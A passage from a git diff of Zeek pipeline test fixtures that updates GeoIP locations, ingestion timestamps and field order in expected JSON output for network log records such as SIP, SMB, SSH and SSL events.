"ip": [ + "89.160.20.156", + "10.156.0.2" + ] + }, "destination": { "port": 5060, "address": "10.156.0.2", @@ -371,14 +381,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -391,6 +401,21 @@ "port": 5083, "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:59:20.758600762Z", + "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", + "created": "2020-04-28T11:07:58.223Z", + "kind": "event", + "action": "OPTIONS", + "id": "CR6XQH1Lf2mF9YG7H2", + "category": [ + "network" + ], + "type": [ + "connection", + "protocol" + ] + }, "url": { "full": "sip:100@89.160.20.156" }, @@ -401,8 +426,10 @@ "protocol": "sip", "community_id": "1:eAmnybkUlcgqIMU6KMfWi3X/b84=", "transport": "udp" - }, - "@timestamp": "2021-03-30T15:50:16.928Z", + } + }, + { + "@timestamp": "2021-03-30T15:58:43.416Z", "ecs": { "version": "1.12.0" }, @@ -412,23 +439,6 @@ "10.156.0.2" ] }, - "event": { - "ingested": "2021-12-09T13:51:09.041835200Z", - "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", - "created": "2020-04-28T11:07:58.223Z", - "kind": "event", - "action": "OPTIONS", - "id": "CR6XQH1Lf2mF9YG7H2", - "category": [ - "network" - ], - "type": [ - "connection", - "protocol" - ] - } - }, - { "destination": { "port": 5060, "address": "10.156.0.2", @@ -461,14 +471,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -481,29 +491,8 @@ "port": 5170, "ip": "89.160.20.156" }, - "url": { - "full": "sip:100@89.160.20.156" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "sip", - "community_id": "1:0TzRwUHcSPsujDehf6eBy7VLTBA=", - "transport": "udp" - }, - "@timestamp": "2021-03-30T15:58:43.416Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "89.160.20.156", - "10.156.0.2" - ] - }, "event": { - "ingested": "2021-12-09T13:51:09.041839500Z", + "ingested": "2021-12-14T14:59:20.758601166Z", "original": "{\"ts\":1617119923.416653,\"uid\":\"Cf9QMt4ear7ZkX74ti\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5170,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:100@1.1.1.1\u003e\",\"call_id\":\"35848812076538877174452\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 127.0.0.1:5170\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -516,6 +505,17 @@ "connection", "protocol" ] + }, + "url": { + "full": "sip:100@89.160.20.156" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "sip", + "community_id": "1:0TzRwUHcSPsujDehf6eBy7VLTBA=", + "transport": "udp" } }, { @@ -527,14 +527,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -583,14 +583,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -627,7 +627,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:09.041844400Z", + "ingested": "2021-12-14T14:59:20.758601548Z", "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json index e9c2a3f4562..921347ce191 100644 --- a/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json +++ b/packages/zeek/data_stream/smb_cmd/_dev/test/pipeline/test-smb-cmd.log-expected.json @@ -43,7 +43,7 @@ "ip": "172.16.133.6" }, "event": { - "ingested": "2021-12-09T13:51:10.088827400Z", + "ingested": "2021-12-14T14:59:21.841268464Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -126,7 +126,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:10.088835100Z", + "ingested": "2021-12-14T14:59:21.841270910Z", "original": "{\"ts\":1361916332.020006,\"uid\":\"CbT8mpAXseu6Pt4R7\",\"id.orig_h\":\"172.16.133.6\",\"id.orig_p\":1728,\"id.resp_h\":\"172.16.128.202\",\"id.resp_p\":445,\"command\":\"NT_CREATE_ANDX\",\"argument\":\"\\u005cbrowser\",\"status\":\"SUCCESS\",\"rtt\":0.091141,\"version\":\"SMB1\",\"tree\":\"\\u005c\\u005cJSRVR20\\u005cIPC$\",\"tree_service\":\"IPC\",\"referenced_file.ts\":1361916332.020006,\"referenced_file.uid\":\"CbT8mpAXseu6Pt4R7\",\"referenced_file.id.orig_h\":\"172.16.133.6\",\"referenced_file.id.orig_p\":1728,\"referenced_file.id.resp_h\":\"172.16.128.202\",\"referenced_file.id.resp_p\":445,\"referenced_file.action\":\"SMB::FILE_OPEN\",\"referenced_file.name\":\"\\u005cbrowser\",\"referenced_file.size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json index 4c2a129efbb..6f461c82ca7 100644 --- a/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json +++ b/packages/zeek/data_stream/smb_files/_dev/test/pipeline/test-smb-files.log-expected.json @@ -1,6 +1,25 @@ { "expected": [ { + "@timestamp": "2017-10-09T16:13:19.576Z", + "file": { + "path": "\\\\\\\\admin-pc\\\\ADMIN$\\PSEXESVC.exe", + "size": 0, + "created": "2017-10-09T16:13:19.607Z", + "name": "PSEXESVC.exe", + "ctime": "2017-10-09T16:13:19.607Z", + "accessed": "2017-10-09T16:13:19.607Z", + "mtime": "2017-10-09T16:13:19.607Z" + }, + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.10.31", + "192.168.10.30" + ] + }, "destination": { "port": 445, "address": "192.168.10.30", @@ -26,35 +45,8 @@ "address": "192.168.10.31", "ip": "192.168.10.31" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "smb", - "community_id": "1:k308wDxRMx/FIEzeh+YwD86zgoA=", - "transport": "tcp" - }, - "@timestamp": "2017-10-09T16:13:19.576Z", - "file": { - "path": "\\\\\\\\admin-pc\\\\ADMIN$\\PSEXESVC.exe", - "size": 0, - "created": "2017-10-09T16:13:19.607Z", - "name": "PSEXESVC.exe", - "ctime": "2017-10-09T16:13:19.607Z", - "accessed": "2017-10-09T16:13:19.607Z", - "mtime": "2017-10-09T16:13:19.607Z" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.10.31", - "192.168.10.30" - ] - }, "event": { - "ingested": "2021-12-09T13:51:10.459184600Z", + "ingested": "2021-12-14T14:59:22.194791121Z", "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -69,6 +61,14 @@ "protocol", "info" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "smb", + "community_id": "1:k308wDxRMx/FIEzeh+YwD86zgoA=", + "transport": "tcp" } }, { @@ -133,7 +133,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:10.459194Z", + "ingested": "2021-12-14T14:59:22.194793465Z", "original": "{\"ts\":1507565599.576942,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"action\":\"SMB::FILE_OPEN\",\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"name\":\"PSEXESVC.exe\",\"size\":0,\"times.modified\":1507565599.607777,\"times.accessed\":1507565599.607777,\"times.created\":1507565599.607777,\"times.changed\":1507565599.607777}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json index a99565de49c..4749c52e4ce 100644 --- a/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json +++ b/packages/zeek/data_stream/smb_mapping/_dev/test/pipeline/test-smb-mapping.log-expected.json @@ -29,7 +29,7 @@ "ip": "192.168.10.31" }, "event": { - "ingested": "2021-12-09T13:51:10.847414400Z", + "ingested": "2021-12-14T14:59:22.565777314Z", "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,7 +96,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:10.847422700Z", + "ingested": "2021-12-14T14:59:22.565779450Z", "original": "{\"ts\":1507565599.576613,\"uid\":\"C9YAaEzWLL62yWMn5\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49239,\"id.resp_h\":\"192.168.10.30\",\"id.resp_p\":445,\"path\":\"\\u005c\\u005cadmin-pc\\u005cADMIN$\",\"share_type\":\"DISK\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json index 51a2cf90be5..e2ba97ee070 100644 --- a/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json +++ b/packages/zeek/data_stream/smtp/_dev/test/pipeline/test-smtp.log-expected.json @@ -1,6 +1,16 @@ { "expected": [ { + "@timestamp": "2018-12-03T22:59:47.381Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.1.10", + "192.168.1.9" + ] + }, "destination": { "port": 25, "address": "192.168.1.9", @@ -20,34 +30,16 @@ "fuids": [] } }, + "tls": { + "established": true + }, "source": { "port": 33782, "address": "192.168.1.10", "ip": "192.168.1.10" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "smtp", - "community_id": "1:38H0puTqOoHT/5r2bKFUVSXifQw=", - "transport": "tcp" - }, - "@timestamp": "2018-12-03T22:59:47.381Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.10", - "192.168.1.9" - ] - }, - "tls": { - "established": true - }, "event": { - "ingested": "2021-12-09T13:51:11.179554200Z", + "ingested": "2021-12-14T14:59:22.884697435Z", "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -59,6 +51,14 @@ "connection", "protocol" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "smtp", + "community_id": "1:38H0puTqOoHT/5r2bKFUVSXifQw=", + "transport": "tcp" } }, { @@ -116,7 +116,7 @@ "established": true }, "event": { - "ingested": "2021-12-09T13:51:11.179563400Z", + "ingested": "2021-12-14T14:59:22.884700028Z", "original": "{\"ts\":1543877987.381899,\"uid\":\"CWWzPB3RjqhFf528c\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":33782,\"id.resp_h\":\"192.168.1.9\",\"id.resp_p\":25,\"trans_depth\":1,\"helo\":\"EXAMPLE.COM\",\"last_reply\":\"220 2.0.0 SMTP server ready\",\"path\":[\"192.168.1.9\"],\"tls\":true,\"fuids\":[],\"is_webmail\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json index a01d7381121..e395698e4fc 100644 --- a/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json +++ b/packages/zeek/data_stream/snmp/_dev/test/pipeline/test-snmp.log-expected.json @@ -39,7 +39,7 @@ "ip": "192.168.1.2" }, "event": { - "ingested": "2021-12-09T13:51:11.552302400Z", + "ingested": "2021-12-14T14:59:23.260384972Z", "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,14 +96,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -117,7 +117,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:11.552374200Z", + "ingested": "2021-12-14T14:59:23.260387718Z", "original": "{\"ts\":1617080496.400704,\"uid\":\"CxtWIB4ECPW89F8mSi\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":37533,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":161,\"duration\":0.0,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":4,\"get_bulk_requests\":0,\"get_responses\":0,\"set_requests\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -194,7 +194,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:11.552380Z", + "ingested": "2021-12-14T14:59:23.260388272Z", "original": "{\"ts\":1543877948.916584,\"uid\":\"CnKW1B4w9fpRa6Nkf2\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":59696,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":161,\"duration\":7.849924,\"version\":\"2c\",\"community\":\"public\",\"get_requests\":0,\"get_bulk_requests\":0,\"get_responses\":8,\"set_requests\":0,\"up_since\":1543631204.766508}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json index 0a141e5257a..f5625bdfbb9 100644 --- a/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json +++ b/packages/zeek/data_stream/socks/_dev/test/pipeline/test-socks.log-expected.json @@ -36,7 +36,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-12-09T13:51:12.003932500Z", + "ingested": "2021-12-14T14:59:23.714621620Z", "original": "{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -111,7 +111,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:12.003940700Z", + "ingested": "2021-12-14T14:59:23.714624270Z", "original": "{\"ts\":1566508093.09494,\"uid\":\"Cmz4Cb4qCw1hGqYw1c\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":35368,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":8080,\"version\":5,\"status\":\"succeeded\",\"request.name\":\"www.google.com\",\"request_p\":443,\"bound.host\":\"0.0.0.0\",\"bound_p\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json index 571b3271453..e4283c232ad 100644 --- a/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json +++ b/packages/zeek/data_stream/ssh/_dev/test/pipeline/test-ssh.log-expected.json @@ -42,7 +42,7 @@ "ip": "192.168.1.2" }, "event": { - "ingested": "2021-12-09T13:51:12.452231300Z", + "ingested": "2021-12-14T14:59:24.056674307Z", "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -94,14 +94,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -115,7 +115,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:12.452241800Z", + "ingested": "2021-12-14T14:59:24.056677136Z", "original": "{\"ts\":1617123417.413634,\"uid\":\"COXxsJ3dlSh6ECRYQj\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38204,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -166,14 +166,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -187,7 +187,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:12.452248100Z", + "ingested": "2021-12-14T14:59:24.056677613Z", "original": "{\"ts\":1617123445.61524,\"uid\":\"CZPdXz1jfKSWzIDAeb\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":44164,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-libssh-0.6.3\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -238,14 +238,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -259,7 +259,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:12.452253900Z", + "ingested": "2021-12-14T14:59:24.056677995Z", "original": "{\"ts\":1617123450.957272,\"uid\":\"Cha1rs3OamonAZ4Nz6\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":33953,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":22,\"auth_attempts\":0,\"direction\":\"INBOUND\",\"client\":\"SSH-2.0-ZGrab ZGrab SSH Survey\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -339,7 +339,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:12.452259700Z", + "ingested": "2021-12-14T14:59:24.056678402Z", "original": "{\"ts\":1562527532.904291,\"uid\":\"CajWfz1b3qnnWT0BU9\",\"id.orig_h\":\"192.168.1.2\",\"id.orig_p\":48380,\"id.resp_h\":\"192.168.1.1\",\"id.resp_p\":22,\"version\":2,\"auth_success\":false,\"auth_attempts\":2,\"client\":\"SSH-2.0-OpenSSH_7.9p1 Ubuntu-10\",\"server\":\"SSH-2.0-OpenSSH_6.6.1p1 Debian-4~bpo70+1\",\"cipher_alg\":\"chacha20-poly1305@openssh.com\",\"mac_alg\":\"umac-64-etm@openssh.com\",\"compression_alg\":\"none\",\"kex_alg\":\"curve25519-sha256@libssh.org\",\"host_key_alg\":\"ecdsa-sha2-nistp256\",\"host_key\":\"86:71:ac:9c:35:1c:28:29:05:81:48:ec:66:67:de:bd\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json index 5fb44d81860..2c757423482 100644 --- a/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json +++ b/packages/zeek/data_stream/ssl/_dev/test/pipeline/test-ssl.log-expected.json @@ -7,14 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -112,7 +112,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T13:51:13.148709Z", + "ingested": "2021-12-14T14:59:24.817281726Z", "original": "{\"ts\":1547688736.805088,\"uid\":\"CAOvs1BMFCX2Eh0Y3\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63199,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FebkbHWVCV8rEEEne\",\"F4BDY41MGUBT6URZMd\",\"FWlfEfiHVkv8evDL3\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -133,14 +133,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -238,7 +238,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T13:51:13.148717100Z", + "ingested": "2021-12-14T14:59:24.817284181Z", "original": 